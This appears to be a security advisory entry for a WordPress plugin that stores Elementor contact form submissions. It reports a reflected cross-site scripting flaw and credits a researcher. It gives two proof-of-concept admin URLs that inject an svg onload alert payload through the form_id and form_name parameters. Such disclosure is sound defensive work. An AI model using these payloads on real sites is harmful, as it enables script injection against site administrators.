The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
When there is at least one submission: https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_id="><svg/onload=alert(/XSS-id/)> https://example.com/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd&form_name="><svg/onload=alert(/XSS-name/)>
ZhongFu Su(JrXnm) of WuHan University
ZhongFu Su(JrXnm) of WuHan University
Yes
2022-07-19 (about 6 months ago)
2022-07-19 (about 6 months ago)
2022-09-26 (about 4 months ago)